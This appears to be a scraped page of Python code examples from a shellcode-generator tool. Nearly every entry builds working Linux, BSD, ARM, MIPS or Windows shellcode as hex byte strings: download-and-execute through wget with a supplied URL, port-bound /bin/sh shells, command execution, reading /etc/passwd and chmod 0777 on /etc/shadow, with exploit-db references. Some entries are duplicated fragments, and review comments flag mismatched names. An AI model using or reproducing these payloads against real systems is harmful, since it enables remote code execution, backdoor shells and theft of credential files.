Пример #1
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["filename"]`` (spliced into the template twice) and
     ``kwargs["url"]`` (spliced in once); a missing key raises ``KeyError``.
     Neither value is validated before concatenation.  Results are written
     to the class-level ``Shellcode.info`` dict, so they replace whatever
     was stored there before.
     """
     # NOTE(review): the url reaches getsize() wrapped in a list while the
     # filename is passed bare -- confirm getsize() handles both shapes.
     Shellcode.info["size"] = (
         101
         + Shellcode().getsize(kwargs["filename"]) * 2
         + Shellcode().getsize([kwargs["url"]])
     )
     fname, link = kwargs["filename"], kwargs["url"]
     # The trailing literals carry the ASCII bytes "/usr", "/bin", "/wge", "t".
     pieces = (
         r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74",
         r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1",
         r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31",
         r"\xc0\x50\xb0\x0f",
         fname,
         r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31",
         r"\xc0\x50",
         fname,
         r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd",
         r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52",
         link,
         r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68",
         r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3",
         r"\x52\x51\x53\x89\xe1\xcd\x80",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #2
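class Payload(Shellcode):
    """Metadata and escaped-byte template for the exploit-db 37285 payload.

    The class body records author, name, references and an assembly listing
    in the class-level ``Shellcode.info`` dict; ``__init__`` adds the size and
    the template built from ``kwargs["file"]``.
    """
    Shellcode.info["author"] = "B3mB4m"
    # NOTE(review): the listing below loads syscall number 0xf with mode
    # 0x1ff, which on Linux/x86 is chmod to 0777 rather than a read; the
    # "file reader" name looks carried over from another payload -- confirm.
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37285/"
    ]
    # Reference listing only: it hard-codes a path ("//etc/shadow" in the
    # pushed dwords) while the template takes the path from kwargs["file"].
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x776f6461",
        "push   $0x68732f63",
        "push   $0x74652f2f",
        "mov    $0xf,%al",
        "mov    %esp,%ebx",
        "mov    $0x1ff,%cx",
        "int    $0x80",
        "xor    %eax,%eax",
        "inc    %eax",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store size and template; raises ``KeyError`` without ``file``.

        ``kwargs["file"]`` is concatenated into the template unvalidated.
        """
        # The size depends on kwargs, which only exists inside __init__;
        # computing it in the class body raised NameError at definition time.
        Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"])
        Shellcode.info["payload"] = [
            r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
            r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
        ]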
Пример #3
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and appends it,
     unvalidated, to the fixed template.  Both results are written to the
     class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 28 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # NOTE(review): target is presumably hex-escape text like the literals
     # below -- nothing here checks that; confirm against the caller.
     pieces = (
         r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46",
         r"\x10\x30\xff\x21\xff\x31\x01\x31\x0f\x37",
         r"\x01\xdf\x40\x40\x01\x27\x01\xdf",
         target,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
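class Payload(Shellcode):
    """Metadata and escaped-byte template for an lport-parameterised payload.

    The class body records author, name, references and an assembly listing
    in the class-level ``Shellcode.info`` dict; ``__init__`` adds the size and
    the template built from ``kwargs["lport"]``.
    """
    Shellcode.info["author"] = "xmgv"
    # NOTE(review): name and listing describe only an execve of /bin/sh,
    # but the template takes an lport value and is far longer than the
    # listing -- the metadata looks incomplete for this payload; confirm.
    Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/36398/",
        "https://xmgv.wordpress.com/2015/02/19/28/",
    ]
    Shellcode.info["rawassembly"] = [
        "xor    %eax,%eax",
        "push   %eax",
        "push   $0x68732f2f",
        "push   $0x6e69622f",
        "mov    %esp,%ebx",
        "push   %eax",
        "push   %ebx",
        "mov    %esp,%ecx",
        "mov    $0xb,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store size and template; raises ``KeyError`` without ``lport``.

        ``kwargs["lport"]`` is concatenated into the template unvalidated.
        """
        # The size depends on kwargs, which only exists inside __init__;
        # computing it in the class body raised NameError at definition time.
        Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
        Shellcode.info["payload"] = [
            r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
            r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
            r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
            r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
            r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
            r"\xcd\x80\x93\x31\xc9\xb1\x02"
            r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
            r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
        ]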
Пример #5
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["execommand"]`` (``KeyError`` if absent) and appends it,
     unvalidated, after the fixed template.  Both results are written to
     the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 29 + Shellcode().getsize(kwargs["execommand"])
     command = kwargs["execommand"]
     # NOTE(review): unlike other snippets on this page, the command is not
     # hex-escaped here -- presumably the caller supplies it already
     # escaped; confirm.
     pieces = (
         r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c",
         r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31",
         r"\xc0\x48\x83\xc8\x3b\x0f\x05",
         command,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #6
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and splices it,
     unvalidated, after the first template fragment.  Both results are
     written to the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # NOTE(review): target is presumably hex-escape text like the literals
     # below -- nothing here checks that; confirm against the caller.
     pieces = (
         r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05",
         target,
         r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0",
         r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80",
         r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd",
         r"\x80\x31\xc0\xb0\x01\xcd\x80",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #7
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and appends it,
     unvalidated, to the fixed template.  Both results are written to the
     class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 47 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # The fixed part carries the ASCII bytes "/cat" and "/bin"; the
     # caller's value follows as trailing data.
     pieces = (
         r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20",
         r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62",
         r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50",
         r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50",
         r"\xcd\x91\xe8\xdb\xff\xff\xff",
         target,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #8
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["execommand"]`` (``KeyError`` if absent) and appends it,
     unvalidated, after the fixed template.  Both results are written to
     the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["execommand"])
     command = kwargs["execommand"]
     # NOTE(review): the command is not hex-escaped in this snippet --
     # presumably the caller supplies it already escaped; confirm.
     pieces = (
         r"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68",
         r"\x68\x2f\x2f\x62\x69\x89\xe3",
         r"\x50\x66\x68\x2d\x63\x89\xe7\x50",
         r"\x51\x57\x53\x89\xe7\x50\x57\x53",
         r"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff",
         command,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #9
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and appends it,
     unvalidated, to the fixed template.  Both results are written to the
     class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 82 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # NOTE(review): the last literal already spells the ASCII bytes
     # "/etc/passwd" followed by 0x41, and the caller's value is appended
     # after it -- the template appears to keep a hard-coded path in
     # addition to the parameter; confirm which one is intended.
     pieces = (
         r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31",
         r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89",
         r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48",
         r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01",
         r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff",
         r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41",
         target,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #10
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["lport"]`` (``KeyError`` if absent) and splices it,
     unvalidated, into the fixed template.  Both results are written to
     the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 93 + Shellcode().getsize(kwargs["lport"])
     port = kwargs["lport"]
     # NOTE(review): an lport parameter plus the ASCII "//sh" and "/bin"
     # fragments near the end suggest a port-bound shell; this snippet
     # carries no name or reference of its own -- confirm.
     pieces = (
         r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16",
         r"\x31\xc0\x50\x68\xff\x02",
         port,
         r"\x89\xe7\x6a\x02\x50\x50",
         r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0",
         r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea",
         r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79",
         r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3",
         r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #11
    def __init__(self, **kwargs):
        """Hex-escape the command and publish size and template.

        Reads ``kwargs["execommand"]`` (``KeyError`` if absent), rewrites each
        character as backslash-x hex text, and appends the result to the
        fixed template.  Both results are written to the class-level
        ``Shellcode.info`` dict.
        """
        # str.encode("hex") exists only on Python 2; on Python 3 this line
        # raises LookupError.
        escaped = "".join("\\x" + ch.encode("hex") for ch in kwargs["execommand"])
        kwargs["execommand"] = escaped

        # NOTE(review): getsize() receives the escaped text (four characters
        # per input character), not the raw command -- confirm it expects that.
        Shellcode.info["size"] = 36 + Shellcode().getsize(escaped)
        pieces = (
            r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1",
            r"\x78\x46\x0a\x30\x01\x90",
            r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf",
            escaped,
        )
        Shellcode.info["payload"] = ["".join(pieces)]
Пример #12
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["lport"]`` (``KeyError`` if absent) and splices it,
     unvalidated, into the fixed template.  Both results are written to
     the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
     port = kwargs["lport"]
     # NOTE(review): port is presumably two bytes of hex-escape text --
     # nothing here checks its length or form; confirm against the caller.
     pieces = (
         r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50",
         r"\xb0\x61\xcd\x80\x96\x52\x66\x68",
         port,
         r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd",
         r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56",
         r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea",
         r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75",
         r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89",
         r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #13
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and appends it,
     unvalidated, to the fixed template.  Both results are written to the
     class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # NOTE(review): target is presumably hex-escape text like the literals
     # below -- nothing here checks that; confirm against the caller.
     pieces = (
         r"\xff\xff\x06\x28\xff\xff",
         r"\xd0\x04\xff\xff\x05\x28",
         r"\xb6\x01\x05\x24\x01\x10",
         r"\xe4\x27\x1f\xf0\x84\x24",
         r"\xaf\x0f\x02\x24\x0c\x01",
         r"\x01\x01\xff\xff\x04\x28",
         r"\xa1\x0f\x02\x24\x0c\x01",
         r"\x01\x01",
         target,
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #14
    def __init__(self, **kwargs):
        """Hex-escape the command and publish size and template.

        Reads ``kwargs["execommand"]`` (``KeyError`` if absent), rewrites each
        character as backslash-x hex text, and splices the result into the
        fixed template.  Both results are written to the class-level
        ``Shellcode.info`` dict.
        """
        # str.encode("hex") exists only on Python 2; on Python 3 this line
        # raises LookupError.
        escaped = "".join("\\x" + ch.encode("hex") for ch in kwargs["execommand"])
        kwargs["execommand"] = escaped

        # NOTE(review): getsize() receives the escaped text (four characters
        # per input character), not the raw command -- confirm it expects that.
        Shellcode.info["size"] = 36 + Shellcode().getsize(escaped)
        # The fixed part carries the ASCII bytes "-c", "/sh" and "/bin".
        pieces = (
            r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f",
            r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12",
            r"\x00\x00\x00",
            escaped,
            r"\x00\x57\x53\x89\xe1\xcd\x80",
        )
        Shellcode.info["payload"] = ["".join(pieces)]
Пример #15
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["lport"]`` (``KeyError`` if absent) and splices it,
     unvalidated, into the fixed template.  Both results are written to
     the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"])
     port = kwargs["lport"]
     # NOTE(review): port is presumably two bytes of hex-escape text --
     # nothing here checks its length or form; confirm against the caller.
     pieces = (
         r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53",
         r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0",
         r"\x66\x43\x52\x66\x68",
         port,
         r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89",
         r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89",
         r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1",
         r"\xcd\x80\x93\x31\xc9\xb1\x02",
         r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92",
         r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e",
         r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["payload"]`` (``KeyError`` if absent) and splices it,
     unvalidated, into the middle of the fixed template.  Both results are
     written to the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = (
         187 + Shellcode().getsize(kwargs["payload"])
     )
     inner = kwargs["payload"]
     # NOTE(review): the literals contain the ASCII fragments "WinE", "Exit"
     # and "Proc", which suggests a Windows target resolving API names at
     # run time; this snippet carries no name or reference -- confirm.
     pieces = (
         r"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31",
         r"\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f",
         r"\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89",
         r"\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd",
         r"\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01",
         r"\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b",
         r"\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd",
         inner,
         r"\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6",
         r"\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75",
         r"\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c",
         r"\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
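class Payload(Shellcode):
    """Metadata and escaped-byte template for the exploit-db 37297 payload.

    The class body records author, name, references and an assembly listing
    in the class-level ``Shellcode.info`` dict; ``__init__`` adds the size and
    the template built from ``kwargs["file"]``.
    """
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux/x86 - file reader"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/37297/"
    ]
    # Reference listing only: it hard-codes a path ("//etc/passwd" in the
    # pushed dwords) while the template takes the path from kwargs["file"].
    Shellcode.info["rawassembly"] = [
        "xor    %ecx,%ecx",
        "xor    %eax,%eax",
        "xor    %edx,%edx",
        "push   %ecx",
        "mov    $0x5,%al",
        "push   $0x64777373",
        "push   $0x61702f63",
        "push   $0x74652f2f",
        "mov    %esp,%ebx",
        "int    $0x80",
        "mov    %ebx,%ecx",
        "mov    %eax,%ebx",
        "mov    $0x3,%al",
        "mov    $0xfff,%dx",
        "inc    %dx",
        "int    $0x80",
        "xor    %eax,%eax",
        "xor    %ebx,%ebx",
        "mov    $0x1,%bl",
        "mov    $0x4,%al",
        "int    $0x80",
        "xor    %eax,%eax",
        "mov    $0x1,%al",
        "int    $0x80",
    ]

    def __init__(self, **kwargs):
        """Store size and template; raises ``KeyError`` without ``file``.

        ``kwargs["file"]`` is concatenated into the template unvalidated.
        """
        # The size depends on kwargs, which only exists inside __init__;
        # computing it in the class body raised NameError at definition time.
        Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"])
        Shellcode.info["payload"] = [
            r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
            r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
            r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
            r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
            r"\x80\x31\xc0\xb0\x01\xcd\x80"
        ]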
Пример #18
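class Payload(Shellcode):
    """Metadata and escaped-byte template for a command-executing payload.

    The class body records author and name in the class-level
    ``Shellcode.info`` dict; ``__init__`` adds the size and the template
    built from ``kwargs["execommand"]``.  No reference URL is recorded.
    """
    Shellcode.info["author"] = "Unkown"
    Shellcode.info["name"] = "Linux/x86 - exec shellcode"

    def __init__(self, **kwargs):
        """Hex-escape the command, then store size and template.

        Raises ``KeyError`` when ``execommand`` is missing.
        """
        # str.encode("hex") exists only on Python 2; on Python 3 this loop
        # raises LookupError.
        db = []
        for x in kwargs["execommand"]:
            db.append("\\x" + x.encode("hex"))
        kwargs["execommand"] = "".join(db)

        # The size depends on kwargs, which only exists inside __init__;
        # computing it in the class body raised NameError at definition time.
        # NOTE(review): getsize() now receives the escaped text (four
        # characters per input character) -- confirm that is what it expects.
        Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"])
        Shellcode.info["payload"] = [
            r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
            r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
            r"\x00\x00\x00"
            + kwargs["execommand"] +
            r"\x00\x57\x53\x89\xe1\xcd\x80"
        ]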
Пример #19
 def __init__(self, **kwargs):
     """Publish the size and escaped-byte template of this payload.

     Reads ``kwargs["file"]`` (``KeyError`` if absent) and splices it,
     unvalidated, after the first template fragment.  Both results are
     written to the class-level ``Shellcode.info`` dict.
     """
     Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"])
     target = kwargs["file"]
     # NOTE(review): target is presumably hex-escape text like the literals
     # below -- nothing here checks that; confirm against the caller.
     pieces = (
         r"\x31\xc0\x50",
         target,
         r"\xb0\x0f\x89\xe3\x66\xb9\xff",
         r"\x01\xcd\x80\x31\xc0\x40\xcd\x80",
     )
     Shellcode.info["payload"] = ["".join(pieces)]
Пример #20
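class Payload(Shellcode):
    """Metadata and escaped-byte template for the exploit-db 39389 payload.

    The class body records author, name, references and an assembly listing
    in the class-level ``Shellcode.info`` dict; ``__init__`` adds the size and
    the template built from ``kwargs["filename"]`` and ``kwargs["url"]``.
    """
    Shellcode.info["author"] = "B3mB4m"
    Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode"
    Shellcode.info["references"] = [
        "https://www.exploit-db.com/exploits/39389/"
    ]

    # Reference listing only: it hard-codes its own strings, whereas the
    # template takes the file name and url from the caller.
    Shellcode.info["rawassembly"] = [
        "xor eax,eax",
        "mov al,0x2",
        "int 0x80",
        "xor ebx,ebx",
        "cmp eax,ebx",
        "jz 0x47",
        "xor ecx,ecx",
        "xor ebx,ebx",
        "xor eax,eax",
        "push byte +0x5",
        "mov ecx,esp",
        "mov ecx,esp",
        "mov ebx,esp",
        "mov al,0xa2",
        "int 0x80",
        "xor ecx,ecx",
        "xor eax,eax",
        "push eax",
        "mov al,0xf",
        "push byte +0x68",
        "mov ebx,esp",
        "xor ecx,ecx",
        "mov cx,0x1ff",
        "int 0x80",
        "xor eax,eax",
        "push eax",
        "push byte +0x68",
        "mov ebx,esp",
        "push eax",
        "mov edx,esp",
        "push ebx",
        "mov ecx,esp",
        "mov al,0xb",
        "int 0x80",
        "xor eax,eax",
        "inc eax",
        "int 0x80",
        "push byte +0xb",
        "pop eax",
        "cdq",
        "push edx",
        "push dword 0x682f6365",
        "push dword 0x78652f2f",
        "push dword 0x6f692e62",
        "push dword 0x75687469",
        "push dword 0x672e6d34",
        "push dword 0x626d3362",
        "mov ecx,esp",
        "push edx",
        "push byte +0x74",
        "push dword 0x6567772f",
        "push dword 0x6e69622f",
        "push dword 0x7273752f",
        "mov ebx,esp",
        "push edx",
        "push ecx",
        "push ebx",
        "mov ecx,esp",
        "int 0x80",
    ]

    def __init__(self, **kwargs):
        """Store size and template from ``filename`` and ``url``.

        Raises ``KeyError`` when either key is missing.  Both values are
        concatenated into the template unvalidated; ``filename`` is used
        twice.
        """
        # The size depends on kwargs, which only exists inside __init__;
        # computing it in the class body raised NameError at definition time.
        # NOTE(review): the url reaches getsize() wrapped in a list while the
        # filename is passed bare -- confirm getsize() handles both shapes.
        Shellcode.info["size"] = \
            101 + Shellcode().getsize(kwargs["filename"]) * 2 + Shellcode().getsize([kwargs["url"]])
        Shellcode.info["payload"] = [
            r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74"
            r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1"
            r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31"
            r"\xc0\x50\xb0\x0f"
            + kwargs["filename"] +
            r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31"
            r"\xc0\x50"
            + kwargs["filename"] +
            r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
            r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52"
            + kwargs["url"] +
            r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68"
            r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3"
            r"\x52\x51\x53\x89\xe1\xcd\x80"
        ]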